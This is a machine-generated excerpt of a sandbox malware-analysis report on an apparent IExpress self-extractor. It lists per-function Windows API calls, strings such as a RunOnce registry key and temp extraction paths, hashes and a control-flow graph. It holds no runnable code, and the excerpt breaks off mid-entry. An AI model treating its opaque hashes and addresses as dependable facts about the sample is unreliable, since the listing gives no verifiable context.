                          • Opcode ID: 18f7d0d8df672b7f8ff2bc21405c924839be97c8656361e9f06e7a67ef0dde56
                          • Instruction ID: 0e4108f0062efb409d5d62d0c52914c3de0659becd214f6f6de76ada4684775c
                          • Opcode Fuzzy Hash: 18f7d0d8df672b7f8ff2bc21405c924839be97c8656361e9f06e7a67ef0dde56
                          • Instruction Fuzzy Hash: 4C514B76618B87B6EB118F20D9042E97BA1FB46B94FC88571CA8DA3795DF3CE519C300
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                          • String ID:
                          • API String ID: 3370778649-0
                          • Opcode ID: 2510229bffcfcd21528b24f34bd27410616bb77d7ecccc953f1e7a4fd532fcaf
                          • Instruction ID: df64630fd4401d84def8e674349c1beacaa992a48bfa27237d8fbcad2fe8d8c6
                          • Opcode Fuzzy Hash: 2510229bffcfcd21528b24f34bd27410616bb77d7ecccc953f1e7a4fd532fcaf
                          • Instruction Fuzzy Hash: 53113D35708B42A7E7145B62A6051BDBAA0FB4EFC1F489438ED8EA3755DF3CD4558700

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                          • API String ID: 3049360512-3137473940
                          • Opcode ID: 945d950d7bb6d2b03bb19646d956afc38b938c28c29c6955e31643fe977d61b4
                          • Instruction ID: 715da5ccd86ddcc2f03b19318cf84e2c9f781ff3f72d7603c7d7abde61301934
                          • Opcode Fuzzy Hash: 945d950d7bb6d2b03bb19646d956afc38b938c28c29c6955e31643fe977d61b4
                          • Instruction Fuzzy Hash: EA512B31A08A83B6EB518B14EA443F97BA0FB85B45F8C5131CA8D97795DF3CE464CB00

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWait
                          • String ID:
                          • API String ID: 976364251-3916222277
                          • Opcode ID: 19170bdb0185dcc4558629786d1e3b276faf8172c778104cd8efa3f0263b16b4
                          • Instruction ID: 476ac9c9fe8169ffb5d8e20846b8dd868734b10b8cd712db0958b6ca9238c282
                          • Opcode Fuzzy Hash: 19170bdb0185dcc4558629786d1e3b276faf8172c778104cd8efa3f0263b16b4
                          • Instruction Fuzzy Hash: C5518D32908A87B6E7608F20EA553FAB7A0FB89754F485135EA8D96794CF7CD464CB00

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: File$Directory$AttributesCreateDeleteNameRemoveTemp
                          • String ID: IXP$IXP%03d.TMP
                          • API String ID: 4001122843-3932986939
                          • Opcode ID: 950e06c3cc114e96d21c71c189c663bea0479e63569984cfb08e3cb431742b4e
                          • Instruction ID: 15f564550317ed66d351c919540bd836277818173a9b3a0b27b7e10f13f79e7f
                          • Opcode Fuzzy Hash: 950e06c3cc114e96d21c71c189c663bea0479e63569984cfb08e3cb431742b4e
                          • Instruction Fuzzy Hash: 7C319236B18A42B6EB108F16A9043F97BA1FB8DB80F5D9131CD8E93391CE7DD455C640

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 720 7ff650541150 721 7ff650541159-7ff650541199 GetStartupInfoW 720->721 722 7ff650541154 call 7ff6505418e4 720->722 724 7ff65054119b-7ff6505411a6 721->724 722->721 725 7ff6505411a8-7ff6505411ab 724->725 726 7ff6505411b2-7ff6505411bb 724->726 729 7ff6505411ad 725->729 730 7ff6505411ca-7ff6505411d5 Sleep 725->730 727 7ff6505411d7-7ff6505411df 726->727 728 7ff6505411bd-7ff6505411c5 _amsg_exit 726->728 732 7ff6505411e1-7ff6505411fe 727->732 733 7ff650541244 727->733 731 7ff65054124e-7ff650541257 728->731 729->726 730->724 734 7ff650541259-7ff65054126c _initterm 731->734 735 7ff650541276-7ff650541278 731->735 736 7ff650541202-7ff650541205 732->736 733->731 734->735 737 7ff65054127a-7ff65054127c 735->737 738 7ff650541283-7ff65054128b 735->738 739 7ff650541207-7ff650541209 736->739 740 7ff650541236-7ff650541238 736->740 737->738 742 7ff65054128d-7ff65054129b call 7ff650541850 738->742 743 7ff6505412c1-7ff6505412d0 738->743 741 7ff65054123a-7ff65054123f 739->741 744 7ff65054120b-7ff65054120f 739->744 740->731 740->741 747 7ff6505413ab-7ff6505413c0 741->747 742->743 754 7ff65054129d-7ff6505412b7 742->754 749 7ff6505412d4-7ff6505412da 743->749 745 7ff65054122b-7ff650541234 744->745 746 7ff650541211-7ff650541227 744->746 745->736 746->745 751 7ff65054134d-7ff650541350 749->751 752 7ff6505412dc-7ff6505412de 749->752 755 7ff65054135f-7ff650541367 _ismbblead 751->755 756 7ff650541352-7ff65054135b 751->756 757 7ff6505412e0-7ff6505412e2 752->757 758 7ff6505412e4-7ff6505412e9 752->758 754->743 759 7ff650541369-7ff65054136c 755->759 760 7ff650541371-7ff650541379 755->760 756->755 757->751 757->758 761 7ff6505412f7-7ff65054132c call 7ff650547fe4 758->761 762 7ff6505412eb-7ff6505412f5 758->762 759->760 760->747 760->749 765 7ff650541336-7ff65054133d 761->765 766 7ff65054132e-7ff650541330 exit 761->766 762->758 767 7ff65054134b 765->767 768 7ff65054133f-7ff650541345 _cexit 765->768 766->765 767->747 768->767
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                          • String ID:
                          • API String ID: 2995914023-0
                          • Opcode ID: dc0a5e20638ea67c63c6f64c653ebcfbc2cd40491069adb64e4f082b60295cf1
                          • Instruction ID: 0a513435678af37dbae0cb7f7c1265deea23235336759af2aebc817053acecbf
                          • Opcode Fuzzy Hash: dc0a5e20638ea67c63c6f64c653ebcfbc2cd40491069adb64e4f082b60295cf1
                          • Instruction Fuzzy Hash: A2613535A0CA43B6E7608B21EA553F936A0FB84794F5C0035DACDE27A4DF7CE861C608
                          APIs
                            • Part of subcall function 00007FF650545140: FindResourceExA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545168
                            • Part of subcall function 00007FF650545140: SizeofResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545179
                            • Part of subcall function 00007FF650545140: FindResourceA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF65054519F
                            • Part of subcall function 00007FF650545140: LoadResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451B0
                            • Part of subcall function 00007FF650545140: LockResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451BF
                            • Part of subcall function 00007FF650545140: memcpy_s.MSVCRT ref: 00007FF6505451DE
                            • Part of subcall function 00007FF650545140: FreeResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451ED
                          • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF65054471F), ref: 00007FF6505456ED
                          • LocalFree.KERNEL32 ref: 00007FF650545766
                            • Part of subcall function 00007FF6505461E8: LoadStringA.USER32 ref: 00007FF650546278
                            • Part of subcall function 00007FF6505461E8: MessageBoxA.USER32 ref: 00007FF6505462B8
                            • Part of subcall function 00007FF650546590: GetLastError.KERNEL32 ref: 00007FF650546594
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                          • String ID: $<None>$UPROMPT
                          • API String ID: 957408736-2569542085
                          • Opcode ID: cc3629978ed69afb5803e0dd2a9524f4ca17eb0d68234ca8f1da61ca061089fe
                          • Instruction ID: e9a94718cf10febad225fa12552f8d19adf78a7dbe327ec039f011bddf485b5d
                          • Opcode Fuzzy Hash: cc3629978ed69afb5803e0dd2a9524f4ca17eb0d68234ca8f1da61ca061089fe
                          • Instruction Fuzzy Hash: 3531B031A0C643F7F7209B20E7513FA7A50EB89784F485135DA8E96B96DFBCE0248B00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: CreateFile$lstrcmp
                          • String ID: *MEMCAB
                          • API String ID: 1301100335-3211172518
                          • Opcode ID: 882ecc141dfa2a6022f31e20c1b0ac6f4acce46d394e68a6a22d01aa207dc993
                          • Instruction ID: c140bab6c9dcea777404f4edc3395c08592b1f841395596ca88b0d9e421cc473
                          • Opcode Fuzzy Hash: 882ecc141dfa2a6022f31e20c1b0ac6f4acce46d394e68a6a22d01aa207dc993
                          • Instruction Fuzzy Hash: FC619472A08743B6F7608F15A6803FD7A91E755BA4F485335CAAE627C0CF7CE4658A00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: FileTime$AttributesDateItemLocalText
                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          • API String ID: 851750970-305352358
                          • Opcode ID: 1b29dbb9e3ca8058bb845d1cdcb3f6214ba747c613cdf2411ff3bfa011323251
                          • Instruction ID: d53a50527a7b6448edfeb3ed6be2a65ae0a03401d0dc6e28ff8d5e42421ee280
                          • Opcode Fuzzy Hash: 1b29dbb9e3ca8058bb845d1cdcb3f6214ba747c613cdf2411ff3bfa011323251
                          • Instruction Fuzzy Hash: 65516B32A1C943B1EA609F25DA041FE67A0FB84B94F584232DACDA37D4DF2CE465C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: AllocLocal
                          • String ID: TMP4351$.TMP
                          • API String ID: 3494564517-2619824408
                          • Opcode ID: f6643adad851909dc84ab3123c3a019038264e65fc77465c454a882d24c4d207
                          • Instruction ID: 3fa87ba6d011d91ebc10c7a6ec70cfd3682fa3e63cddd96e1a73cc93ef84c242
                          • Opcode Fuzzy Hash: f6643adad851909dc84ab3123c3a019038264e65fc77465c454a882d24c4d207
                          • Instruction Fuzzy Hash: E531B271A18A83B6FB104B25A6003F97A90EB85BA4F5C4334DAAD937D5CF7CD4198701
                          APIs
                            • Part of subcall function 00007FF650545140: FindResourceExA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545168
                            • Part of subcall function 00007FF650545140: SizeofResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545179
                            • Part of subcall function 00007FF650545140: FindResourceA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF65054519F
                            • Part of subcall function 00007FF650545140: LoadResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451B0
                            • Part of subcall function 00007FF650545140: LockResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451BF
                            • Part of subcall function 00007FF650545140: memcpy_s.MSVCRT ref: 00007FF6505451DE
                            • Part of subcall function 00007FF650545140: FreeResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451ED
                          • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF650544735), ref: 00007FF6505445B9
                          • LocalFree.KERNEL32 ref: 00007FF65054463C
                            • Part of subcall function 00007FF6505461E8: LoadStringA.USER32 ref: 00007FF650546278
                            • Part of subcall function 00007FF6505461E8: MessageBoxA.USER32 ref: 00007FF6505462B8
                            • Part of subcall function 00007FF650546590: GetLastError.KERNEL32 ref: 00007FF650546594
                          • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF650544735), ref: 00007FF650544662
                          • LocalFree.KERNEL32(?,?,?,?,?,00007FF650544735), ref: 00007FF6505446C3
                            • Part of subcall function 00007FF6505464B0: FindResourceA.KERNEL32 ref: 00007FF6505464DA
                            • Part of subcall function 00007FF6505464B0: LoadResource.KERNEL32 ref: 00007FF6505464F1
                            • Part of subcall function 00007FF6505464B0: DialogBoxIndirectParamA.USER32 ref: 00007FF650546527
                            • Part of subcall function 00007FF6505464B0: FreeResource.KERNEL32 ref: 00007FF650546539
                          • LocalFree.KERNEL32 ref: 00007FF65054469C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                          • String ID: <None>$LICENSE
                          • API String ID: 2414642746-383193767
                          • Opcode ID: 4caabee9ee0ad8c32e7f245cf07f671de7ab33bfc02977cd0a3ed29220ffecaf
                          • Instruction ID: 1a5acc834d795d9bc790fe0405b6d9391275f4234594914cd6c4d74e34442221
                          • Opcode Fuzzy Hash: 4caabee9ee0ad8c32e7f245cf07f671de7ab33bfc02977cd0a3ed29220ffecaf
                          • Instruction Fuzzy Hash: 24317C31A19A03B3F7209F20E6153F97660FB85745F485134C98EE6795EF7CE0248B00
                          APIs
                          • RegOpenKeyExA.KERNELBASE(?,?,?,?,00000000,00007FF650542566), ref: 00007FF650543527
                          • RegQueryValueExA.KERNELBASE(?,?,?,?,00000000,00007FF650542566), ref: 00007FF650543558
                          • RegCloseKey.KERNELBASE(?,?,?,?,00000000,00007FF650542566), ref: 00007FF650543576
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager
                          • API String ID: 3677997916-3057196482
                          • Opcode ID: 340b8b646548313282c693838e7f25eceb0ba4f0296da7f4314fc4dbeecda6e5
                          • Instruction ID: 37881dcb2cb9102ad93379fb43532e1c8583580e6dd8fa6565f1fda77a202ca9
                          • Opcode Fuzzy Hash: 340b8b646548313282c693838e7f25eceb0ba4f0296da7f4314fc4dbeecda6e5
                          • Instruction Fuzzy Hash: AA117F32A08643B7E7208B19E5441B9BBA1FB8A350F584135DBCD92B68DF3DD828CA00
                          APIs
                            • Part of subcall function 00007FF650547F58: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF650544A99), ref: 00007FF650547F7C
                            • Part of subcall function 00007FF650547F58: PeekMessageA.USER32 ref: 00007FF650547FC2
                          • WriteFile.KERNELBASE ref: 00007FF6505487F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: FileMessageMultipleObjectsPeekWaitWrite
                          • String ID:
                          • API String ID: 3430465807-0
                          • Opcode ID: 991d4bdccbb001d71ab861eb250e50ad34ff21f81909168724640f7d797acd5b
                          • Instruction ID: 3bc722409aa00ad78f1a9123598fb29cd57acbb7f5f16d840b958f20e80554dd
                          • Opcode Fuzzy Hash: 991d4bdccbb001d71ab861eb250e50ad34ff21f81909168724640f7d797acd5b
                          • Instruction Fuzzy Hash: 0C218030A08643B6E7108F16E6443B9B7A0FB94B94F588234D99DA77A4CF3DD425CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                          • String ID:
                          • API String ID: 2018477427-0
                          • Opcode ID: 4737db5ac4d1f4b61336884d07e3be5c2f7f4e323d7d01ce83fef1e9a7c030ba
                          • Instruction ID: 534daef40cf95729eff845af909d04184a0d750a6636c4dafa81ccd51e42df1d
                          • Opcode Fuzzy Hash: 4737db5ac4d1f4b61336884d07e3be5c2f7f4e323d7d01ce83fef1e9a7c030ba
                          • Instruction Fuzzy Hash: E9117C31A4CA87B6FB514F10A6483F56690AF95758F1C5131CDCCA2794DF3CE8A5CA40
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: CharPrev
                          • String ID:
                          • API String ID: 122130370-0
                          • Opcode ID: 8245624d2b9ebc6079e72f8030c20bb1c2af5584c94ac8071bf526b29981342a
                          • Instruction ID: ed8aad8f13eb5d66ab1cf2dfd3d648000d0016aa3ddd548d9b2ed029dfe1f59d
                          • Opcode Fuzzy Hash: 8245624d2b9ebc6079e72f8030c20bb1c2af5584c94ac8071bf526b29981342a
                          • Instruction Fuzzy Hash: 3B01DB11D0C7C6F6F3104B15A5403BD7A91A745BA0F9C9230DBA9677D5CF2CD4528704
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID:
                          • API String ID: 2962429428-0
                          • Opcode ID: 631afb329a542f924e594eb567a6f67e576df5b656a914a684b149cc5fb41dd4
                          • Instruction ID: 66192c20b23eef4706776b2cb03a3e7cd43244d779157d274b8961d008a37c11
                          • Opcode Fuzzy Hash: 631afb329a542f924e594eb567a6f67e576df5b656a914a684b149cc5fb41dd4
                          • Instruction Fuzzy Hash: 90F01D31608682B2EB584F25F6851BC76A0EB48B58F189236DA6B97784CF78D495C710
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                          • String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          • API String ID: 3530494346-2931560057
                          • Opcode ID: dbd1a73f92a2ede6a0db1f7413e4fbcd9cca187b76dce4bf4ac4b133ae738712
                          • Instruction ID: bd0babafe736df0b9c4de0b6f50dbee3872564fb5ed43516f5e3bbf56b957f80
                          • Opcode Fuzzy Hash: dbd1a73f92a2ede6a0db1f7413e4fbcd9cca187b76dce4bf4ac4b133ae738712
                          • Instruction Fuzzy Hash: 27717F71E08647BAF7608B32A7053F97A91EF85B90F5C8134CA8EA2795DF3CE5658700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                          • String ID: CheckTokenMembership$advapi32.dll
                          • API String ID: 4204503880-1888249752
                          • Opcode ID: e160c6785fde90a48b04fb9c74fff3393dcd095ced99b921061e37aaea61ca71
                          • Instruction ID: ba2e6ab6e870ff84be919f0dda8378054b42bc6b17054a2148250778904e996b
                          • Opcode Fuzzy Hash: e160c6785fde90a48b04fb9c74fff3393dcd095ced99b921061e37aaea61ca71
                          • Instruction Fuzzy Hash: 1F314136608B46AAD750CF16F4441EABBA0FB89B90F495135EE8D93714DF3CE455CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
